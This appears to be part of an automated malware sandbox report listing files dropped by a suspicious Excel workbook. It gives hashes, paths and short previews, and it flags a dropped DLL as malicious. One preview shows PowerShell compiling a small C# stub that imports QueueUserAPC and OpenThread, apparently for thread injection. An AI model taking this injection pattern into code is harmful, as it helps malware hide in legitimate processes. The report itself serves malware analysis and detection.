                                                                                                                                                            MD5:08FF6EA95709ECCD2B18301DCA6EAD36
                                                                                                                                                            SHA1:469301BA96736DCD6E881F50D86AF5320A75C26A
                                                                                                                                                            SHA-256:F19D71EDF9EC0442F39B771CEC6C9A0BFBAA991C1CCA6EBF6E99CC1C0D827750
                                                                                                                                                            SHA-512:9F0EE89A376FD13FCF4A5DA55EB4E1074716FDD4E43628934FF2CD2109531079E272736DB7DE4974FCB8F9ED525736A6DD894A36DC0B76D2D291077DCE91EA92
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\othn[1].htm
                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2468
                                                                                                                                                            Entropy (8bit):5.978095281262444
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:N8EDibBvAI07bJm723rr7tnlAk4VHRGhNN/pZWpiQD9:BDibhi74723RyVHo4pia9
                                                                                                                                                            MD5:08FF6EA95709ECCD2B18301DCA6EAD36
                                                                                                                                                            SHA1:469301BA96736DCD6E881F50D86AF5320A75C26A
                                                                                                                                                            SHA-256:F19D71EDF9EC0442F39B771CEC6C9A0BFBAA991C1CCA6EBF6E99CC1C0D827750
                                                                                                                                                            SHA-512:9F0EE89A376FD13FCF4A5DA55EB4E1074716FDD4E43628934FF2CD2109531079E272736DB7DE4974FCB8F9ED525736A6DD894A36DC0B76D2D291077DCE91EA92
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\K[1].htm
                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):328568
                                                                                                                                                            Entropy (8bit):5.999873099768718
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:kQQVB8m8TrdrfMxd3T0vWpl4QeAH4zxTHaeNcUjGPja0ZIOFoIJC1YXqdFjwM2yP:kQCBN8HdrSl4vDQNmxT6eNJijTZIOFoV
                                                                                                                                                            MD5:A2224302946ACCE38437F9307221542B
                                                                                                                                                            SHA1:290E519A95F8AE7E4A00DAF1167B8B825D1573E3
                                                                                                                                                            SHA-256:47232537A605E7A1384906C71CEF74BB1C2C532F2D0C1B54AF2FAC5346B9AB45
                                                                                                                                                            SHA-512:FE148531D6BED8B200B67D082E375B2C563032756B6E0EC937A823D35B9B6ECF2C6A388CB9B89FC40623E27EA974E4AC6059989DF55BFEDB24CE294562C588F1
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\UZ97[1].htm
                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):328568
                                                                                                                                                            Entropy (8bit):5.999873099768718
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:kQQVB8m8TrdrfMxd3T0vWpl4QeAH4zxTHaeNcUjGPja0ZIOFoIJC1YXqdFjwM2yP:kQCBN8HdrSl4vDQNmxT6eNJijTZIOFoV
                                                                                                                                                            MD5:A2224302946ACCE38437F9307221542B
                                                                                                                                                            SHA1:290E519A95F8AE7E4A00DAF1167B8B825D1573E3
                                                                                                                                                            SHA-256:47232537A605E7A1384906C71CEF74BB1C2C532F2D0C1B54AF2FAC5346B9AB45
                                                                                                                                                            SHA-512:FE148531D6BED8B200B67D082E375B2C563032756B6E0EC937A823D35B9B6ECF2C6A388CB9B89FC40623E27EA974E4AC6059989DF55BFEDB24CE294562C588F1
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):455680
                                                                                                                                                            Entropy (8bit):6.751938575699122
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:AmYDWUbdfyU+H93bJ3aBGQIuSR35F5VBpx:yBbdfJsJqBG5VB/
                                                                                                                                                            MD5:F3BE390B01C85970DEEAE124CA36CE2D
                                                                                                                                                            SHA1:93114ECF1B2C711EC10E1FAFDC834393EFC11A97
                                                                                                                                                            SHA-256:4EEF8B6A5BCD808CD0AB0E33EFCEA2C2F9A36ABE556E56556DE8550383C9D3CE
                                                                                                                                                            SHA-512:463829E0A07A2983D967483D49DD478243658C0BE583BCDDB801CD45BEB869EEE8CDA812EA3A74E5CF5D70BE07B5A59677317DBADCEFDB8A21DE3DDCBE7FA3A6
                                                                                                                                                            Malicious:true
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):89
                                                                                                                                                            Entropy (8bit):4.594574127566828
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:oVXUxKsMTRb8JOGXnExKsMTRwCn:o9U8rqE8gC
                                                                                                                                                            MD5:3D41A434776BF18F4210264D55425F2A
                                                                                                                                                            SHA1:FFF512CDEBF629DD6422C86A3EDA890EEA27C7E7
                                                                                                                                                            SHA-256:F3C52FF6CB2E9DF7C07F0C6EFA7335C1CF041183DFBFB07065597733554F4E7B
                                                                                                                                                            SHA-512:10BA8CCC4F234C64B9EBD807FACC2C2FFE7CA1D8CA82E5059BE5408738F9E92B18DD2B19DEEE9730D544CE40A005C0D95BACB095A77569C2931D42E4B9C6F45B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: [2021/07/08 15:47:34.648] Latest deploy version: ..[2021/07/08 15:47:34.648] 11.211.2 ..
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu1bwi3u.hs4.psm1
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqu4u5sp.pln.ps1
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfa1axxq.cvf.ps1
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xm5ssgy3.k4v.psm1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.0.cs
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text
Category:dropped
Size (bytes):396
Entropy (8bit):4.9841648897335995
Encrypted:false
SSDEEP:6:V/DsYLDS81zuJGa7mMRSR7a12P5JSSRa+rVSSRnA/fDDQy:V/DTLDfucaA3xv9rV5nA/HQy
MD5:AFB1799F1AEBC489A9583C7CF3EABC87
SHA1:BF47182925DED6BD7A35E2EA57C44C4B5D28CDAD
SHA-256:AF6E88061E474FF75EE21A0521844D64DE10EFF291A6D4C7AB4850D9166F0F98
SHA-512:9D9A5B9C8CD76E3F3C97B6060D5B3AD2129FFA34ECAF8C78559D53D25F749DF254A6872E878D8CE032B33B353804B3587DD7890EE5C10820E67EC0CF8676C5B2
Malicious:false
Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class susrkisij. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr ajmlxynp,IntPtr pgoq,IntPtr qtbri);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint nrr,uint kxj,IntPtr rmmfwi);.. }..}.
C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:dropped
Size (bytes):369
Entropy (8bit):5.267867671414711
Encrypted:false
SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fsXnsUzxs7+AEszIWXp+N23fsXn6:p37Lvkmb6KHUXnsUWZE8UXn6
MD5:CEEDB7C51F915816EBDA2EC610D66C71
SHA1:8237138597D4F9FB2EC14242EF6974D1366AFB76
SHA-256:31FFD039D190821F2C61A674FB875D083BCDE9631235376F81F5C27688583FFB
SHA-512:7101BEBFAFAF862A0F0341864802AA6B12DC7E5D5A95545C519838E79242BD941AF6A1D5B4E3D425ACC0403144D215A76F8DAFF24C676AA7847085693A210E26
Malicious:false
Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.0.cs"
C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.out
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:modified
Size (bytes):454
Entropy (8bit):5.38028381091174
Encrypted:false
SSDEEP:6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fsXnsUzxs7+AEsz+:xKIR37Lvkmb6KHUXnsUWZE8UXnn
MD5:A14AD1BA111418248D596DB485C0A5FC
SHA1:8ED521CF791C4922C15B803DE64DC219897BC81E
SHA-256:306B8FCCFA6D2C04DD5493DF9EDA6695772DE2EEAD0DACC0274C07A27C749F57
SHA-512:032F5CAE351024E685DA3E47B0B50EA909F6C2580F6585173EC3669194C9B3BC3808419B15729613E7DA5EB2080D80EFB5617BEF749DEFA97C732CD67DDE91D9
Malicious:false
Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.0.cs"......
C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.0.cs
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text
Category:dropped
Size (bytes):396
Entropy (8bit):4.9841648897335995
Encrypted:false
SSDEEP:6:V/DsYLDS81zuJGa7mMRSR7a12P5JSSRa+rVSSRnA/fDDQy:V/DTLDfucaA3xv9rV5nA/HQy
MD5:AFB1799F1AEBC489A9583C7CF3EABC87
SHA1:BF47182925DED6BD7A35E2EA57C44C4B5D28CDAD
SHA-256:AF6E88061E474FF75EE21A0521844D64DE10EFF291A6D4C7AB4850D9166F0F98
SHA-512:9D9A5B9C8CD76E3F3C97B6060D5B3AD2129FFA34ECAF8C78559D53D25F749DF254A6872E878D8CE032B33B353804B3587DD7890EE5C10820E67EC0CF8676C5B2
Malicious:false
Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class susrkisij. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr ajmlxynp,IntPtr pgoq,IntPtr qtbri);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint nrr,uint kxj,IntPtr rmmfwi);.. }..}.
C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:dropped
Size (bytes):369
Entropy (8bit):5.22358074629342
Encrypted:false
SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fIT4x0zxs7+AEszIWXp+N23fIT4DH:p37Lvkmb6KHcWZE8ZHn
MD5:5861E4F177E993C70FC9E148D834D688
SHA1:7E787C9CA4A454AF88BAA1BE98083B81D08355F8
SHA-256:F7B8EEAB6FBB19C838CAFAEB2CDF6850ED1A190E840F6BA1146FDC7BEB813D38
SHA-512:CEA11D2A215E232AEB9A3BD6E37E5709E17F88DD0F8A5E7D95FB9EC42CB6AA853AC4E014D7C37CE3C190A5AB5B6FB5D123D06B8FFAE4545D704EB2CDB6E04462
Malicious:true
Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.0.cs"
C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.out
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:modified
Size (bytes):454
Entropy (8bit):5.360834939406208
Encrypted:false
SSDEEP:6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fIT4x0zxs7+AEszO:xKIR37Lvkmb6KHcWZE8ZH+
MD5:2871DCAC841DB5BE9CE399BB6B760857
SHA1:23F0ACB68C09E4CFBA7C15567BEEEB67F2D3F69B
SHA-256:1856A0F7CA9DA06E3429B6730EABF243591BF467B9B86674777121858FF9211A
SHA-512:7A5047AED02EECE3FBE737EA84D20C2D5DC1F633166B2673DB716A4ECAD61D7DDBBEEA0771DBC22B49CCD5A073FAB9275657F63852FF39A7B04AB60B80E36BBD
Malicious:false
Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.0.cs"......
C:\Users\user\AppData\Local\Temp\~DF2EB1C9CA29BD00CF.TMP
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:data
Category:dropped
Size (bytes):14245
Entropy (8bit):1.1113575184431475
Encrypted:false
SSDEEP:96:kBqoIci6q01eTedvHX4xH28A6AQsq97qJlA:kBqoIci8D4NWA
MD5:C4B1F31EB96AEA043348A0005402FD3A
SHA1:068F3619FD0F74CA21221B3E2EBD54BB881BCB94
SHA-256:824ADFF0D18A52F9B8811BD5866ADD4F0855E6A03B77CF88C9A0479362650383
SHA-512:5B09B24F1B834FA33B04F2F647DDDEE7ED70C435D3AD11BA8AA886A8A12245B65029947AC8A1263458133CD9CD667CAEC2F469D2B2073502F2F233973B26CD8D
Malicious:false
Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DF436C4ACF406520B7.TMP
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:data
Category:dropped
Size (bytes):40169
Entropy (8bit):0.6758992421665342
Encrypted:false
SSDEEP:96:kBqoxKAuvScS+bVHuVkrdTY5ArdTY5brdTY58:kBqoxKAuqR+bVHuVkNMANMbNM8
MD5:98FABC5D4AA9C8A1CBA8966AB226FC9B
SHA1:BFDCB96E44BDB4F82E60DD429C64A27B752A2793
SHA-256:119EA23EEBD7433269B0ED395AF2CE42551097E1EBA9F3D2099C42DBC30411AA
SHA-512:010B3CB1FF1AA3792060D12EC33D459779891F33B0AD57E46C0C6FA7AA5683D7C7E30EF89CCAD9E10C771849750D739500343B733F572488558321CE13F0379C
Malicious:false
Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DF4AB9BBFB5CFFE773.TMP
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:data
Category:dropped
Size (bytes):40169
Entropy (8bit):0.6743248643482478
Encrypted:false
SSDEEP:96:kBqoxKAuvScS+tzxQTmnXN2l9SonXN2l9SDnXN2l9Sk:kBqoxKAuqR+tzxQTmXUyoXUyDXUyk
MD5:5A19002C8E15DBFE531737D2D37682E6
SHA1:164D5BCBC8EB0C75690BAB805A8F24212895DEC3
SHA-256:938D4A4803DFA1AFA749995371F82B33F8F4F29E35F4286813A58519EF4EC730
SHA-512:5BA4841262E939567C13AAD0B23D34A9B2901588CAC01ABC00C06749D9195CB1D23E3D262F2A8896BCBFCEE645DB305260EBEC372CBEAD4F0E9B01D626C71BEE
Malicious:false
Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DF6208F46269C5D052.TMP
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:data
Category:dropped
Size (bytes):40161
Entropy (8bit):0.6748703445699284
Encrypted:false
SSDEEP:96:kBqoxKAuvScS+Z3lUXW59Fut1a59Fut1B59Fut1y:kBqoxKAuqR+Z3lUXW5W65Wh5WS
MD5:E487AA3B836E17916B59CC267C42DB1B
SHA1:C86717A0951ED79ADA5963B14400FD8ECA765143
SHA-256:B023CE9CD16C9C77AEF77219946915B75DB61F6DF56E91AF62186E4991F26201
                                                                                                                                                            SHA-512:2A4536492153EE64E21B624BF8FB05FEF7C8C669B29541F4F90DAC204C8C1D68DBF0C4C8CA6D77940739ACF539A24A5B9EEB436623655D97AD0975CCB562B0BD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF903C43FA17F64456.TMP
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40217
                                                                                                                                                            Entropy (8bit):0.6824868847646752
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:kBqoxKAuqR+1bZILmn2AHnNbtjn2AHnNbt8n2AHnNbt5:d1HnN91HnNU1HnN3
                                                                                                                                                            MD5:55ED7624FEBCB3D4D10CFBB1FD665939
                                                                                                                                                            SHA1:83B6054B5096FD7EBABEEA53BE00C1B710676C66
                                                                                                                                                            SHA-256:60E9AEFBC296C12DA1CACF8C5B7B384BA22AEF36046A29931F558413B39993BC
                                                                                                                                                            SHA-512:C76288BD25AE9A3A286A0ACF71A821E0602381D0DEEE22371254E60F0589FC3A59D8DD2FD43070F130A302A7470A840E87CAECC5379C0E5BCBA0138E521A33E2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF97CC7EC2853BA6EC.TMP
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):12933
                                                                                                                                                            Entropy (8bit):0.4122061728840318
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:c9lLh9lLh9lIn9lIn9loNrF9loNR9lWNsrFsr5:kBqoIN6NENcFc5
                                                                                                                                                            MD5:87C19B0AB66776EC233AF2A84EC29542
                                                                                                                                                            SHA1:3AD7C158FDD12B3FCAC40EC1CFAB167397E10BA0
                                                                                                                                                            SHA-256:98BDB4F5B241F3CBF9E9E8FAFFFAE23365AFDB548E9C63DCA54F668FB45A6811
                                                                                                                                                            SHA-512:93FDEEB6A231F5BD105B18B33B564256DAD879096F0495F15A1914F1D2FEB68010779D3C53C329DE8E78D7277754ED3DB46CCA876ACA6EFD7513803F7519C648
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF99BD870E81A4914B.TMP
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40169
                                                                                                                                                            Entropy (8bit):0.6727491699490233
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:kBqoxKAuqR+NTRwzGepzz6wepzz6Lepzz6M:kBqoxKAuqR+NTRwzGOHOwO9
                                                                                                                                                            MD5:926AA50F9B11397E3CB026AFA8F59655
                                                                                                                                                            SHA1:07358B1366A7A90477254B9B073E3D19C7959E6E
                                                                                                                                                            SHA-256:B9C313F4D5CCD3AB8DCB6373C9B65DAC432A8A7A557A31F0A5005A0B5ADFC7EB
                                                                                                                                                            SHA-512:534EA55B6C42AB0A5809BFB8E0528645CD3F2295BB075678036D113D6369A0DB04E165ED3A97B9635D94C741EBDD7E2EE3EBD36981B044E3526A76D742D69948
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFA7B5BF1FB774EA36.TMP
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40185
                                                                                                                                                            Entropy (8bit):0.6770652307487162
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:kBqoxKAuqR+2wqDwpiUmCIiJviUmCIiJgiUmCIiJd:kBqoxKAuqR+2wqDwp3OiV3OiO3OiT
                                                                                                                                                            MD5:086E54865041FD1E00156F954E240361
                                                                                                                                                            SHA1:4A39E548815BDFAF58CBC642C295FF436C5152F2
                                                                                                                                                            SHA-256:524B452798FFB015874E19A35433B693FB1AA36C11B4871A4AD25CBD320C01DF
                                                                                                                                                            SHA-512:CA07CEB170C43046BC4E924E58F7416C9A3DF762ACDCC3CDEC3BCFF9BBBA50F05992D41321DC578F37CDC9FB742D9E0D531CDBD6B27A751A9E0D8B8279C39BB4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\Desktop\~$documentation_39236.xlsb
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):330
                                                                                                                                                            Entropy (8bit):1.6081032063576088
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                            MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                            SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                            SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                            SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            C:\Users\user\Documents\20210708\PowerShell_transcript.632922.jVqfQyN1.20210708154748.txt
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):976
                                                                                                                                                            Entropy (8bit):5.493748444770493
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:BxSAIxvBnkx2DOXUWOLCHGIYBtBCWnHjeTKKjX4CIym1ZJXgPOLCHGIYBtBW:BZcvhkoORFeVnqDYB1Z2pFeW
                                                                                                                                                            MD5:D3EB7CE30813D194C9F4EA29241E921B
                                                                                                                                                            SHA1:09ED495F6254C8953B08B5B87C0FDCF74ED0E5BD
                                                                                                                                                            SHA-256:3EBEBB577CB48D71A54F92CD0AE010EA1A6FFB63E1CF7EC709C082F8CAC3BD18
                                                                                                                                                            SHA-512:9986FE5500C18B9C1419EF4DAB022B54841210C36C2200EA0C5A1FCDB52B039D9C8FB569986B524337937125E055B8C870A3884D5011E79120A211DBC4100B94
                                                                                                                                                            Malicious:false
